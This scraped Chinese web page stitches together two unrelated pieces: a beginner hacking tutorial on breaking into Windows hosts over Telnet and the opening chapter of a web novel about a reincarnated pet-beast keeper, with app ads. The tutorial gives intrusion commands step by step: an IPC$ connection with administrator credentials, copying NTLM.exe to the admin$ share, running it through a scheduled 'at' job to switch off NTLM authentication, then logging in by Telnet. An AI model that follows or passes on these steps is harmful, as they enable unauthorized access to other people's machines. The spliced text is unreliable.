没有2003系统用XP的mstsc也可以连接运行mstsc/v:IP/console就可以连接到远程系统的的0会话,mstsc还有很多参数可以运行mstsc/?来查看
蛛丝马迹揪出入侵你服务器凶手
Tel***入侵指令分析
简单介绍关于NTLM验证
由于Tel***功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Tel***添加了身份验证,称为NTLM验证,它要求Tel***终端除了需要有Tel***服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Tel***主机的安全性,就像一只拦路虎把很多入侵者拒之门外。(关于NTLM我有写一个专门帖子。。各位可以去看看)
1.使用tel***连接主机
指令格式(cmd):tel***192.168.0.0连接端口号
如果要断开。。就是exit。。
这个本人写了一个很详细的帖子发表在黑盟“远程开启tel***“
2.典型tel***入侵攻略
第一步:建立IPC$连接(本人也写了很详细关于IPC$连接的方法),
第二步:开启远程tel***连接,首先在cmd(确定此时的根目录是目标的)输入指令。。service开启service项目。。。仔细找找。。。就有Tel***服务项。。。。把它打开。。。
第三步:取消IPC$连接:***use192.168.0.0/del
第四步:去掉NTLM验证,如果没有去除目标上的NTLM验证,在登录目标的电脑的时候就会失败。
其实方法有很多种。。。本人就介绍我最常用的一个。。也是最简单的方法吧。。。
首先,在本地计算机上建立一个与远程主机上相同的账号和密码。
指令:***localgroupalpha/add不过确定对方的账号也是alpha。。因为要相同的。。
第二步:通过“开始”→“程序”→“附件”找到“命令提示符”,使用鼠标右键单击“命令提示符”,然后选择“属性”。
在“以其他用户身份运行(U)”前面挑上挑。。然后点。。“确定”接着。。仍然按照上述路径找到“命令提示符”(cmd)。。之后用左健打开它。。。。
之后写上用户名和密码。。。alpha的
然后点确定。。。得到cmdshell框。。。
之后输入我们的指令:tel***192.168.0.0
现在就会显示一个更新后的cmdshell。。这个shell就192.168.0.0上的。。。
其实去掉NTLM验证的方法很多。。。我再介绍给大家一个方法。。。
这个方法就是超级菜鸟话。。。因为我们需要用到一个工具。。NTLM.exe。。这个工具就像是3389.exe一样。。只要把3389.exe传到一台机器上去执行。。那台机器上的3389端口就会自动打开。。。
NTLM.exe的运作概念和3389.exe是一样的。。。我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上。。。
首先:开cmd。。
然后输入指令:***use\\192.168.0.0\ipc$*&"&"\user:administrator
之后再输入指令:copyc:\NTLM.exe\\192.168.0.0\admin$
解释一下:\admin$是使用192.168.0.0主机上的admin用户共享权限。。。。
然后再输入察看时间指令:***time\\192.168.0.0
我们假如对方的时间是2007/9/21下午3点21分。。。
之后再输入执行指令:at\\192.168.0.015:22NTLM.exe
解释一下:15:22是24小时至的下午3点22分。。。cmdshell输入指令时一定要写24小时的。。尒説书网
之后当按回车确定后得到:新增加一项作业或者是什么指令成功完成的提示字后。。。等待1分钟。。。让cmd完成我们的shell***mand。。。
之后我们再输入指令:tel***192.168.0.0
Ok.........................大功告成。。。。
如果要恢复NTLM验证。。。我们要用到一个shell工具:resumetel***.exe
resumetel***.exe使用的方法是这样的。。。
命令格式:ResumeTel***.exe\\\\servernamepassword
其中servername是主机域名或者是IP都可以。。。我们就写192.168.0.0
password当然就是密码了。。。。
回车确定。。。。。。。。。。。。。。。。。。当显示the***mand***pletedsuccessfully后。。一切完成。。。。。。。。。。。。 有的人死了,但没有完全死……
无尽的昏迷过后,时宇猛地从床上起身。想要看最新章节内容,请下载爱阅小说app,无广告免费阅读最新章节内容。网站已经不更新最新章节内容,已经爱阅小说APP更新最新章节内容。
他大口的呼吸起新鲜的空气,胸口一颤一颤。
迷茫、不解,各种情绪涌上心头。
这是哪?
随后,时宇下意识观察四周,然后更茫然了。
一个单人宿舍?
就算他成功得到救援,现在也应该在病房才对。
还有自己的身体……怎么会一点伤也没有。
带着疑惑,时宇的视线快速从房间扫过,最终目光停留在了床头的一面镜子上。
镜子照出他现在的模样,大约十七八岁的年龄,外貌很帅。
可问题是,这不是他!下载爱阅小说app,阅读最新章节内容无广告免费
之前的自己,是一位二十多岁气宇不凡的帅气青年,工作有段时间了。
而现在,这相貌怎么看都只是高中生的年纪……
这个变化,让时宇发愣很久。
千万别告诉他,手术很成功……
身体、面貌都变了,这根本不是手术不手术的问题了,而是仙术。
他竟完全变成了另外一个人!
难道……是自己穿越了?
除了床头那摆放位置明显风水不好的镜子,时宇还在旁边发现了三本书。
时宇拿起一看,书名瞬间让他沉默。
《新手饲养员必备育兽手册》
《宠兽产后的护理》
《异种族兽耳娘评鉴指南》
时宇:???
前两本书的名字还算正常,最后一本你是怎么回事?
“咳。”
时宇目光一肃,伸出手来,不过很快手臂一僵。
就在他想翻开第三本书,看看这究竟是个什么东西时,他的大脑猛地一阵刺痛,大量的记忆如潮水般涌现。
冰原市。
宠兽饲养基地。
实习宠兽饲养员。网站即将关闭,下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术
御兽师?
章节错误,点此报送(免注册),
报送后维护人员会在两分钟内校正章节内容,请耐心等待